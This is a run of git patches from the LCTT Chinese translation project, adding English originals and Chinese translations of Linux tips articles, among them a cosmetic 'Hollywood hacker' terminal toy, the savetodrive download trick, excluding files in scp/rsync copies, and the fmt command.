**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
![Hollywood hacking terminal in Linux][1]
From 7bce8d8d6919a4441c69bdd3c91200d76c2ede60 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 00:33:44 +0800
Subject: [PATCH 206/371] Translated by Drshu
---
...llywood Hacker Screen in Linux Terminal.md | 75 -------------------
1 file changed, 75 deletions(-)
delete mode 100644 sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
deleted file mode 100644
index 5c147692bc..0000000000
--- a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ /dev/null
@@ -1,75 +0,0 @@
-Translating by Drshu
-
-Fake A Hollywood Hacker Screen in Linux Terminal
-======
-
-**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
-
-![Hollywood hacking terminal in Linux][1]
-
-I am in!
-
-You might have heard this dialogue in almost every Hollywood movie that shows a hacking scene. There will be a dark terminal with ASCII text, diagrams and hex code changing continuously, and a hacker who is hitting the keyboard as if he/she is typing an angry forum response.
-
-But that's Hollywood! Hackers break into a network system in minutes whereas it takes months of research to actually do that. But I'll put the Hollywood hacking criticism aside for the moment.
-
-Because we are going to do the same. We are going to pretend like a hacker in Hollywood style.
-
-There's this tiny tool that runs a script turning your Linux terminal into a Hollywood style real time hacking terminal:
-
-Like what you see? It even plays Mission Impossible theme music in the background. Moreover, you get a new, random generated hacking terminal each time you run this tool.
-
-Let's see how to become a Hollywood hacker in 30 seconds.
-
-### How to install Hollywood hacking terminal in Linux
-
-The tool is quite aptly called Hollywood. Basically, it runs in Byobu, a text-based window manager, and it creates a random number of randomly sized split windows and runs a noisy text app in each of them.
-
-[Byobu][2] is an interesting tool developed by Dustin Kirkland of Ubuntu. More about it in some other article. Let's focus on installing this tool.
-
-Ubuntu users can install Hollywood using this simple command:
-```
-sudo apt install hollywood
-```
-
-If the above command doesn't work in your Ubuntu or other Ubuntu based Linux distributions such as Linux Mint, elementary OS, Zorin OS, Linux Lite etc, you may use the below PPA:
-```
-sudo apt-add-repository ppa:hollywood/ppa
-sudo apt-get update
-sudo apt-get install byobu hollywood
-```
-
-You can also get the source code of Hollywood from its GitHub repository:
-
-[Hollywood on GitHub][3]
-
-Once installed, you can run it using the command below, no sudo required:
-
-`hollywood`
-
-As it runs Byobu first, you'll have to use Ctrl+C twice and then use `exit` command to stop the hacking terminal script.
-
-Here's a video of the fake Hollywood hacking. Do [subscribe to our YouTube channel][4] for more Linux fun videos.
-
-It's a fun little tool that you can use to amaze your friends, family, and colleagues. Maybe you can even impress girls in the bar though I don't think it is going to help you a lot in that field.
-
-And if you liked Hollywood hacking terminal, perhaps you would like to check another tool that gives [Sneaker movie effect in Linux terminal][5].
-
-If you know more such fun utilities, do share with us in the comment section below.
-
---------------------------------------------------------------------------------
-
-via: https://itsfoss.com/hollywood-hacker-screen/
-
-作者:[Abhishek Prakash][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://itsfoss.com/author/abhishek/
-[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
-[2]:http://byobu.co/
-[3]:https://github.com/dustinkirkland/hollywood
-[4]:https://www.youtube.com/c/itsfoss?sub_confirmation=1
-[5]:https://itsfoss.com/sneakers-movie-effect-linux/
From 48b4a2b9bd2411dc32e44ee06b454e008ef85402 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 00:36:00 +0800
Subject: [PATCH 207/371] Translated by Drshu and added file
---
...llywood Hacker Screen in Linux Terminal.md | 82 +++++++++++++++++++
1 file changed, 82 insertions(+)
create mode 100644 translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
new file mode 100644
index 0000000000..89d0d17196
--- /dev/null
+++ b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -0,0 +1,82 @@
+在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+======
+
+**摘要:这是一个简单的小工具,可以把你的 Linux 终端变为好莱坞风格的黑客入侵的实时画面。**
+
+我进去了!
+
+你可能在几乎所有展示黑客入侵场景的好莱坞电影里都听到过这句话。那往往是一个黑色的终端,上面是 ASCII 字符、图表和不断变化的十六进制编码,还有一个黑客正在猛敲键盘,仿佛他/她正在打一段愤怒的论坛回复。
+
+但那是好莱坞大片!现实中,黑客需要经过数月的研究才能真正入侵一个网络系统,而不是几分钟。不过这里我暂且把对好莱坞式黑客的批评放在一边。
+
+因为我们将要做同样的事情:像好莱坞电影里那样,假装成一个黑客。
+
+有一个小工具,它会在你的 Linux 终端上运行一个脚本,把终端变成好莱坞风格的实时入侵画面:
+
+![在 Linux 上的 Hollywood 入侵终端][1]
+
+看到了吗?就像这样,它甚至在后台播放了 Mission Impossible 的主题音乐。此外,每次运行这个工具,你都会得到一个全新的、随机生成的入侵终端。
+
+让我们看看如何在 30 秒之内成为一个好莱坞黑客。
+
+
+
+### 如何在 Linux 上安装 Hollywood 入侵终端
+
+这个工具的名字非常贴切,就叫 Hollywood。从根本上说,它运行在 Byobu(一个基于文本的窗口管理器)之中,它会创建随机数量、随机尺寸的分屏,并在每个分屏里运行一个不停输出杂乱文字的应用。
+
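+如果只是想体会一下这种效果的原理,下面是一个极简的示意脚本(它不是 Hollywood 本身,只是假设系统装有 tmux,用几条命令手工拼出分屏加各自刷屏的样子):
+```
+#!/bin/sh
+# 示意脚本:用 tmux 模拟多个分屏各自输出杂乱文字的效果(假设已安装 tmux)
+tmux new-session -d -s fakehack 'top'                       # 第一个窗格运行 top
+tmux split-window -h -t fakehack 'hexdump -C /dev/urandom'  # 右侧窗格滚动十六进制输出
+tmux split-window -v -t fakehack 'ping 127.0.0.1'           # 下方窗格不停输出 ping 结果
+tmux attach -t fakehack                                     # 连上去观看;结束时可执行 tmux kill-session -t fakehack
+```
+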
+[Byobu][2] 是一个由 Ubuntu 的 Dustin Kirkland 开发的有趣工具,我们会在其他文章中对它做更多介绍,这里先专心安装 Hollywood 这个工具。
+
+Ubuntu 用户可以使用简单的命令安装 Hollywood:
+
+```
+sudo apt install hollywood
+```
+
+如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint, elementary OS, Zorin OS, Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
+
+```
+sudo apt-add-repository ppa:hollywood/ppa
+sudo apt-get update
+sudo apt-get install byobu hollywood
+```
+
+你也可以在它的 GitHub 仓库之中获得其源代码:
+
+[Hollywood 在 GitHub][3]
+
+一旦安装好,你可以使用下面的命令运行它,不需要使用 sudo :
+
+`hollywood`
+
+因为它会先运行 Byobu,你需要按两次 Ctrl+C,然后再使用 `exit` 命令退出,才能停止这个入侵终端脚本。
+
+这是一个演示好莱坞式入侵效果的视频。[订阅我们的 YouTube 频道][4]可以看到更多关于 Linux 的有趣视频。
+
+这是一个可以让你的朋友、家人和同事感到吃惊的有趣小工具,甚至你可以拿它在酒吧里给女孩们留下深刻的印象,尽管我不认为这对你在那方面有多大帮助。
+
+并且如果你喜欢 Hollywood 入侵终端,或许你也会喜欢另一个可以[让 Linux 终端产生 Sneaker 电影效果的工具][5]。
+
+如果你知道更多有趣的工具,可以在下面的评论栏里分享给我们。
+
+
+
+------
+
+via: https://itsfoss.com/hollywood-hacker-screen/
+
+作者:[Abhishek Prakash][a]
+译者:[Drshu](https://github.com/Drshu)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://itsfoss.com/author/abhishek/
+[1]: https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
+[2]: http://byobu.co/
+[3]: https://github.com/dustinkirkland/hollywood
+[4]: https://www.youtube.com/c/itsfoss?sub_confirmation=1
+[5]: https://itsfoss.com/sneakers-movie-effect-linux/
\ No newline at end of file
From 70c3846795efd6d404e359f486e37142102c567b Mon Sep 17 00:00:00 2001
From: wxy
Date: Wed, 10 Jan 2018 07:04:45 +0800
Subject: [PATCH 208/371] PRF:20171120 Save Files Directly To Google Drive And
Download 10 Times Faster.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@Drshu 恭喜你完成了第一篇翻译!
不过,请注意译文中对 md 格式的处理,或者这个是你的 md 编辑器导致的。
---
...ogle Drive And Download 10 Times Faster.md | 78 ++++++++++---------
1 file changed, 41 insertions(+), 37 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index 566424de98..25e915de78 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -1,41 +1,45 @@
+直接保存文件至 Google Drive 并用十倍的速度下载回来
+=============
-# 直接保存文件至 Google Drive 并用十倍的速度下载回来
![][image-1]
-最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
+最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB。
-![使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+![使用 Chrome 下载 MIUI 更新][image-2]
-考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
+考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等互联)。这意味着我可以在所有的 Google 产品中获得一个惊人的速度,例如 Google Drive、YouTube 和 PlayStore。
-所以我找到一个网络服务叫做[savetodrive](https://savetodrive.net/)。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
+所以我找到一个网络服务叫做 [savetodrive][2]。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
现在让我们来看看如何操作。
-### *第一步*
+### 第一步
+
获得文件的下载链接,将它复制到你的剪贴板。
-### *第二步*
-前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
+### 第二步
-![savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+前往链接 [savetodrive][2] 并且点击相应位置以验证身份。
-这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
+![savetodrive 将文件保存到 Google Drive ][image-3]
-![请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+这将会请求获得使用你 Google Drive 的权限,点击 “Allow”。
-### *第三步*
-你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
+![请求获得 Google Drive 的使用权限][image-4]
-![savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+### 第三步
+
+你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”。
+
+![savetodrive 直接给 Google Drive 上传文件][image-5]
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-![Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+![Google Drive savetodrive][image-6]
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-![如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+![如何从浏览器上下载 MIUI 更新][image-7]
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
@@ -49,30 +53,30 @@ via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-time
作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
译者:[Drshu][10]
-校对:[校对者ID]((null))
+校对:[wxy][11]
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[2]: https://savetodrive.net/
-[3]: http://www.savetodrive.net
-[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
-[9]: http://www.theitstuff.com/author/reevkandari
-[10]: https://github.com/Drshu
-[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
-[12]: https://github.com/LCTT/TranslateProject
-[13]: https://linux.cn/
+[1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[2]: https://savetodrive.net/
+[3]: http://www.savetodrive.net
+[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
+[9]: http://www.theitstuff.com/author/reevkandari
+[10]: https://github.com/Drshu
+[11]: https://github.com/wxy
+[12]: https://github.com/LCTT/TranslateProject
+[13]: https://linux.cn/
-[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
-[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
+[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
From 0efcad7f7cc0129da2cd37bfcd4d0251bc6541b3 Mon Sep 17 00:00:00 2001
From: wxy
Date: Wed, 10 Jan 2018 07:05:31 +0800
Subject: [PATCH 209/371] PUB:20171120 Save Files Directly To Google Drive And
Download 10 Times Faster.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@Drshu 文章首发地址: https://linux.cn/article-9225-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/Drshu
---
...Files Directly To Google Drive And Download 10 Times Faster.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md (100%)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/published/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
similarity index 100%
rename from translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
rename to published/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
From 1a72470dfa02f8b692cd823c9a9aa2299bfe7218 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Wed, 10 Jan 2018 08:51:20 +0800
Subject: [PATCH 210/371] translated
---
...file when using scp command recursively.md | 89 -------------------
...file when using scp command recursively.md | 86 ++++++++++++++++++
2 files changed, 86 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171228 How to exclude file when using scp command recursively.md
create mode 100644 translated/tech/20171228 How to exclude file when using scp command recursively.md
diff --git a/sources/tech/20171228 How to exclude file when using scp command recursively.md b/sources/tech/20171228 How to exclude file when using scp command recursively.md
deleted file mode 100644
index cee6bad5a1..0000000000
--- a/sources/tech/20171228 How to exclude file when using scp command recursively.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating---geekpi
-
-How to exclude file when using scp command recursively
-======
-
-I need to copy all the *.c files from local laptop named hostA to hostB including all directories. I am using the following scp command but do not know how to exclude specific files (such as *.out):
-```
-$ scp -r ~/projects/ user@hostB:/home/delta/projects/
-```
-
-How do I tell scp command to exclude particular file or directory at the Linux/Unix command line?
-
-One can use scp command to securely copy files between hosts on a network. It uses ssh for data transfer and authentication purpose. Typical syntax is:
-
-```
-scp file1 user@host:/path/to/dest/
-scp -r /path/to/source/ user@host:/path/to/dest/
-```
-
-## Scp exclude files
-
-I don't think you can filter or exclude files when using the scp command. However, there is a great workaround to exclude files and copy them securely using ssh. This page explains how to filter or exclude files when using scp to copy a directory recursively.
-
-## How to use rsync command to exclude files
-
-The syntax is:
-`rsync -av -e ssh --exclude='*.out' /path/to/source/ [[email protected]][1]:/path/to/dest/`
-Where,
-
- 1. **-a** : Recurse into directories i.e. copy all files and subdirectories. Also, turn on archive mode and all other options (-rlptgoD)
- 2. **-v** : Verbose output
- 3. **-e ssh** : Use ssh for remote shell so everything gets encrypted
- 4. **\--exclude='*.out'** : exclude files matching PATTERN e.g. *.out or *.c and so on.
-
-
-### Example of rsync command
-
-In this example copy all file recursively from ~/virt/ directory but exclude all *.new files:
-`$ rsync -av -e ssh --exclude='*.new' ~/virt/ [[email protected]][1]:/tmp`
-Sample outputs:
-[![Scp exclude files but using rsync exclude command][2]][2]
-
-The rsync command will fail if rsync is not found on the remote server. In that case try the following scp command that uses [bash shell pattern matching][3] in the current directory (it won't work with the -r option):
-`$ ls `
-Sample outputs:
-```
-centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
-```
-
-
-Copy everything in the current directory except .new file(s):
-```
-$ shopt -s extglob
-$ scp !(*.new) [[email protected]][1]:/tmp/
-```
-Sample outputs:
-```
-centos71.log 100 % 4262 1.3MB/s 00:00
-centos71.qcow2 100 % 836MB 32.7MB/s 00: 25
-meta-data 100 % 47 18.5KB/s 00:00
-user-data 100 % 1543 569.7KB/s 00:00
-```
-
-
-See the following man pages for more info:
-```
-$ [man rsync][4]
-$ man bash
-$ [man scp][5]
-```
-
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/faq/scp-exclude-files-when-using-command-recursively-on-unix-linux/
-
-作者:[Vivek Gite][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
-[2]:https://www.cyberciti.biz/media/new/faq/2017/12/scp-exclude-files-on-linux-unix-macos-bash-shell-command-line.jpg
-[3]:https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html#Pattern-Matching
-[4]:https://www.samba.org/ftp/rsync/rsync.html
-[5]:https://man.openbsd.org/scp
diff --git a/translated/tech/20171228 How to exclude file when using scp command recursively.md b/translated/tech/20171228 How to exclude file when using scp command recursively.md
new file mode 100644
index 0000000000..e8623baa02
--- /dev/null
+++ b/translated/tech/20171228 How to exclude file when using scp command recursively.md
@@ -0,0 +1,86 @@
+如何在递归地使用 scp 命令时排除文件
+======
+
+我需要将名为 hostA 的本地笔记本上的所有 *.c 文件(包括所有子目录)复制到 hostB。我使用的是下面的 scp 命令,但不知道如何排除特定的文件(如 \*.out):
+```
+$ scp -r ~/projects/ user@hostB:/home/delta/projects/
+```
+如何告诉 scp 命令在 Linux/Unix 命令行中排除特定的文件或目录?
+
+人们可以使用 scp 命令在网络主机之间安全地复制文件。它使用 ssh 进行数据传输和身份验证。典型的语法是:
+
+```
+scp file1 user@host:/path/to/dest/
+scp -r /path/to/source/ user@host:/path/to/dest/
+```
+
+## Scp 排除文件
+
+我不认为你可以在使用 scp 命令时过滤或排除文件。但是,有一个很好的解决方法来排除文件并使用 ssh 安全地复制它。本页面说明如何在使用 scp 递归复制目录时过滤或排除文件。
+
+## 如何使用 rsync 命令排除文件
+
+语法是:
+`rsync -av -e ssh --exclude='*.out' /path/to/source/ [[email protected]][1]:/path/to/dest/`
+这里:
+
+ 1. **-a** :递归到目录,即复制所有文件和子目录。另外,打开归档模式和所有其他选项(-rlptgoD)
+ 2. **-v** :详细输出
+ 3. **-e ssh** :使用 ssh 作为远程 shell,这样所有的东西都被加密
+ 4. **\--exclude='*.out'** :排除匹配模式的文件,例如 \*.out 或 \*.c 等。
+
+
+### rsync 命令的例子
+
+在这个例子中,从 ~/virt/ 目录递归地复制所有文件,但排除所有 \*.new 文件:
+`$ rsync -av -e ssh --exclude='*.new' ~/virt/ [[email protected]][1]:/tmp`
+示例输出:
+[![Scp exclude files but using rsync exclude command][2]][2]
+
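+`--exclude` 选项可以重复多次,也可以改用 `--exclude-from` 从一个文件里读取要排除的模式(下面沿用问题中的目录,排除的模式只是示例):
+```
+rsync -av -e ssh --exclude='*.out' --exclude='*.o' --exclude='.git/' ~/projects/ user@hostB:/home/delta/projects/
+rsync -av -e ssh --exclude-from='exclude.txt' ~/projects/ user@hostB:/home/delta/projects/
+```
+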
+如果远程服务器上找不到 rsync,那么 rsync 命令将失败。在这种情况下,请尝试使用以下 scp 命令,该命令在当前目录中使用 [bash shell 模式匹配][3](它不能与 -r 选项一起使用):
+`$ ls `
+示例输出:
+```
+centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data
+```
+
+
+复制当前目录中除 \*.new 文件之外的所有内容:
+```
+$ shopt -s extglob
+$ scp !(*.new) [[email protected]][1]:/tmp/
+```
+示例输出:
+```
+centos71.log 100 % 4262 1.3MB/s 00:00
+centos71.qcow2 100 % 836MB 32.7MB/s 00: 25
+meta-data 100 % 47 18.5KB/s 00:00
+user-data 100 % 1543 569.7KB/s 00:00
+```
+
+
+有关更多信息,请参阅以下手册页:
+```
+$ [man rsync][4]
+$ man bash
+$ [man scp][5]
+```
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/scp-exclude-files-when-using-command-recursively-on-unix-linux/
+
+作者:[Vivek Gite][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
+[2]:https://www.cyberciti.biz/media/new/faq/2017/12/scp-exclude-files-on-linux-unix-macos-bash-shell-command-line.jpg
+[3]:https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html#Pattern-Matching
+[4]:https://www.samba.org/ftp/rsync/rsync.html
+[5]:https://man.openbsd.org/scp
From daa21ee658ab6632e6cd4acbb0f2af131d975d3d Mon Sep 17 00:00:00 2001
From: geekpi
Date: Wed, 10 Jan 2018 08:55:59 +0800
Subject: [PATCH 211/371] translating
---
...w To Display Asterisks When You Type Password In terminal.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
index d0d8328370..7a49972103 100644
--- a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
+++ b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
How To Display Asterisks When You Type Password In terminal
======
From 199c553b55b77dac63e92f55e7e9a1ef99193e2d Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 10:09:31 +0800
Subject: [PATCH 212/371] translate done: 20170918 Linux fmt command - usage
and examples.md
---
... Linux fmt command - usage and examples.md | 93 ---------------
... Linux fmt command - usage and examples.md | 106 ++++++++++++++++++
2 files changed, 106 insertions(+), 93 deletions(-)
delete mode 100644 sources/tech/20170918 Linux fmt command - usage and examples.md
create mode 100644 translated/tech/20170918 Linux fmt command - usage and examples.md
diff --git a/sources/tech/20170918 Linux fmt command - usage and examples.md b/sources/tech/20170918 Linux fmt command - usage and examples.md
deleted file mode 100644
index 19d0452d96..0000000000
--- a/sources/tech/20170918 Linux fmt command - usage and examples.md
+++ /dev/null
@@ -1,93 +0,0 @@
-translating by lujun9972
-Linux fmt command - usage and examples
-======
-
-Sometimes you may find yourself in a situation where-in the requirement is to format the contents of a text file. For example, the text file contains one word per line, and the task is to format all the words in a single line. Of course, this can be done manually, but not everyone likes doing time consuming stuff manually. Plus, that's just one use-case - the requirement could be anything.
-
-Gladly, there exists a command that can cater to at-least some of the text formatting requirements. The tool in question is dubbed **fmt**. In this tutorial, we will discuss the basics of fmt, as well as some of main features it provides. Please note that all commands and instructions mentioned here have been tested on Ubuntu 16.04LTS.
-
-### Linux fmt command
-
-The fmt command is a simple text formatting tool available to users of the Linux command line. Following is its basic syntax:
-
-fmt [-WIDTH] [OPTION]... [FILE]...
-
-And here's how the man page describes it:
-
-Reformat each paragraph in the FILE(s), writing to standard output. The option -WIDTH is an abbreviated form of --width=DIGITS.
-
-Following are some Q&A-styled examples that should give you a good idea about fmt's usage.
-
-### Q1. How to format contents of file in single line using fmt?
-
-That's what the fmt command does when used in its basic form (sans any options). You only need to pass the filename as an argument.
-
-fmt [file-name]
-
-The following screenshot shows the command in action:
-
-[![format contents of file in single line][1]][2]
-
-So you can see that multiple lines in the file were formatted in a way that everything got clubbed up in a single line. Please note that the original file (file1 in this case) remains unaffected.
-
-### Q2. How to change maximum line width?
-
-By default, the maximum width of a line that fmt command produces in output is 75. However, if you want, you can change that using the **-w** command line option, which requires a numerical value representing the new limit.
-
-fmt -w [n] [file-name]
-
-Here's an example where width was reduced to 20:
-
-[![change maximum line width][3]][4]
-
-### Q3. How to make fmt highlight the first line?
-
-This can be done by making the indentation of the first line different from the rest, something which you can do by using the **-t** command line option.
-
-fmt -t [file-name]
-
-[![make fmt highlight the first line][5]][6]
-
-### Q4. How to make fmt split long lines?
-
-The fmt command is capable of splitting long lines as well, a feature which you can access using the **-s** command line option.
-
-fmt -s [file-name]
-
-Here's an example of this option:
-
-[![make fmt split long lines][7]][8]
-
-### Q5. How to have separate spacing for words and lines?
-
-The fmt command offers a **-u** option, which ensures one space between words and two between sentences. Here's how you can use it:
-
-fmt -u [file-name]
-
-Note that this feature was enabled by default in our case.
-
-### Conclusion
-
-Agreed, fmt offers limited features, but you can't say it has limited audience. Reason being, you never know when you may need it. Here, in this tutorial, we've covered majority of the command line options that fmt offers. For more details, head to the tool's [man page][9].
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-fmt-command/
-
-作者:[Himanshu Arora][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
-[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
-[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
-[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
-[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
-[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
-[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
-[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
-[9]:https://linux.die.net/man/1/fmt
diff --git a/translated/tech/20170918 Linux fmt command - usage and examples.md b/translated/tech/20170918 Linux fmt command - usage and examples.md
new file mode 100644
index 0000000000..e9b1d8921a
--- /dev/null
+++ b/translated/tech/20170918 Linux fmt command - usage and examples.md
